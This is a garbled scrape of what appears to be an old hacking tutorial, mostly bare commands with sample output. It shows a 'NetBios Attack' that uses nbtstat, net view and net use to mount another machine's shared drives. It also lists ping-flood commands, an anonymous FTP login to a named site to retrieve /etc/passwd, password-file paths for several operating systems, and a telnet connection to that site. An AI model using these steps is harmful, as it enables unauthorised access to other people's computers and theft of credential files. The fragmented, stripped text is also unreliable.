You are on page 1of 2

.

: IP
"."NetBios Attack
1 IP ( 10102010202 ).2 START RUN CMD .3 Nbtstat A IP ADRESS : IP IP ADRESS ENTER .
4 :NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------------J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
: .
5 >< HEX CODE VALUE 10 PRINTER OR FILES SHARED
TURNED ON

.
6-

2
1

...
:
:
ping -t www.***.com

ping -t -a -f www.***.com

ping www.***.com
"ping
"
com/com.wav
com3/com3/.wav
com1/com.wav

ping -w timeout www.***.com

NETSTAT -S

NETSTAT -A

NETSTAT -N


NETSTAT -P

drwatson


NetBios Attack
Home Network
LAN WAN MAN

user anonymous

passtttttttt@yahoo.com


..

cute ftp - ws_ftp



ftp.kahane.org

retr /etc/passwd
/etc passwd

Sunos 5.0 etc/shadowetc/passwd
Linux etc/shadowetc/passwd
BSD4.3 RENO etc/master.passwd
AIX etc/security/passwd
NTscripts/passwd
passwd admin.pwl ::
...
][IMG]http://www2.0zz0.com/2006/08/17/858791495.gif[/IMG.
.
www.alamal-tv.com
:
www.mshakel.com

:
>Net view \\<insert ip_address here
7 :
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
8 TEMP :Net use x: \\<insert IP address here>\temp
NSETBIOS

..
*

User name-Password

PASSWD


FTP=File Transfer Protocol

start==>run
telnet
Remote System ==> connect
Host Name
kahane.org
PORT 12
connect
.. !! source code

You might also like